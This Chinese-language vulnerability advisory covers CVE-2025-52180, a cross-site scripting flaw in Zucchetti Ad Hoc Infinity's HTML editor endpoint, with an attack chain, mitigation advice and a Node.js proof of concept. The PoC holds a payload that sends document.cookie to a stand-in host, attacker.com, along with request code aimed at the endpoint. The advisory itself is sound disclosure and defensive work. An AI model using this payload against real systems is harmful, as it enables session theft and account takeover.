CVE-2025-52180 Zucchetti Ad Hoc Infinity XSS漏洞

漏洞信息

漏洞编号

CVE-2025-52180

漏洞类型

XSS跨站脚本

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Zucchetti Ad Hoc Infinity 4.2及更早版本

漏洞概述

CVE-2025-52180是Zucchetti Ad Hoc Infinity软件中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于4.2及更早版本中，攻击者可以通过pHtmlSource参数在/ahi/jsp/gsfr_feditorHTML.jsp端点注入任意JavaScript代码。由于该端点未对用户输入进行充分的过滤和转义，恶意脚本会被存储在服务器端，其他用户在访问相关页面时会触发执行。攻击者可利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或修改页面内容。由于漏洞无需认证即可利用，但需要诱导用户访问恶意链接或页面，因此CVSS评分为6.1，属于中等严重程度。

技术细节

该漏洞是一个经典的存储型XSS漏洞，出现在Zucchetti Ad Hoc Infinity的HTML编辑器组件中。具体来说，问题出在gsfr_feditorHTML.jsp页面的pHtmlSource参数处理逻辑上。当用户提交包含恶意JavaScript代码的内容时，服务器端未对其进行适当的输入验证和输出编码，直接将用户输入存储并呈现给其他用户。攻击者可以构造包含<script>标签或事件处理器(如onerror、onload等)的payload，例如：<img src=x onerror=alert(document.cookie)>。由于该输入被存储在数据库中，任何访问该内容的用户都会自动执行恶意代码。攻击者通常利用此漏洞窃取受害者的认证令牌，通过窃取的cookie冒充合法用户进行未授权操作。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用Zucchetti Ad Hoc Infinity系统，并发现存在/ahi/jsp/gsfr_feditorHTML.jsp端点

STEP 2

步骤2: 构造XSS Payload

攻击者构造恶意JavaScript代码，如<img src=x onerror=alert(document.cookie)>，用于窃取用户会话信息

STEP 3

步骤3: 注入恶意代码

通过pHtmlSource参数将XSS payload注入到目标端点，由于缺乏输入过滤，恶意代码被存储在服务器端

STEP 4

步骤4: 诱导用户访问

攻击者通过钓鱼邮件、社交工程等方式诱导已登录用户访问包含恶意代码的页面

STEP 5

步骤5: 窃取敏感信息

当用户访问页面时，恶意JavaScript自动执行，将用户的cookie或其他敏感数据传输到攻击者控制的服务器

STEP 6

步骤6: 会话劫持

攻击者使用窃取的cookie冒充合法用户，执行未授权操作或获取更高权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-52180 XSS PoC for Zucchetti Ad Hoc Infinity
// Target: /ahi/jsp/gsfr_feditorHTML.jsp?pHtmlSource parameter

const axios = require('axios');

const targetUrl = 'http://target.com/ahi/jsp/gsfr_feditorHTML.jsp';

// XSS payload - steals cookie
const xssPayload = '<img src=x onerror="fetch(`https://attacker.com/log?c="+document.cookie)">';

// Construct malicious URL
const maliciousUrl = `${targetUrl}?pHtmlSource=${encodeURIComponent(xssPayload)}`;

console.log('[*] CVE-2025-52180 XSS PoC');
console.log(`[*] Target: ${targetUrl}`);
console.log(`[*] Malicious URL: ${maliciousUrl}`);

// Simulate sending the request
axios.get(maliciousUrl)
  .then(response => {
    console.log('[+] Payload sent successfully');
    console.log('[+] When victim visits the page, cookie will be exfiltrated');
  })
  .catch(err => {
    console.error('[-] Error:', err.message);
  });

// Alternative: Direct form submission
async function sendViaPOST() {
  const formData = new URLSearchParams();
  formData.append('pHtmlSource', xssPayload);
  
  await axios.post(targetUrl, formData);
  console.log('[+] POST payload sent successfully');
}

影响范围

Zucchetti Ad Hoc Infinity <= 4.2

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解：1)在前端和后端对所有用户输入进行严格的输入验证，拒绝包含<script>标签或事件处理器属性的内容；2)实施输出编码，确保特殊字符被正确转义；3)配置Web应用防火墙(WAF)规则过滤恶意XSS payload；4)限制对/ahi/jsp/gsfr_feditorHTML.jsp端点的访问；5)监控访问日志及时发现异常请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-52180
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-52180
3 Details https://www.cvedetails.com/cve/CVE-2025-52180/
4 VulDB https://vuldb.com/cve/CVE-2025-52180
5 Link https://gist.github.com/alex-xor/8d0f9f456e6840a955889305ea789ef8
6 Link https://www.zucchetti.it/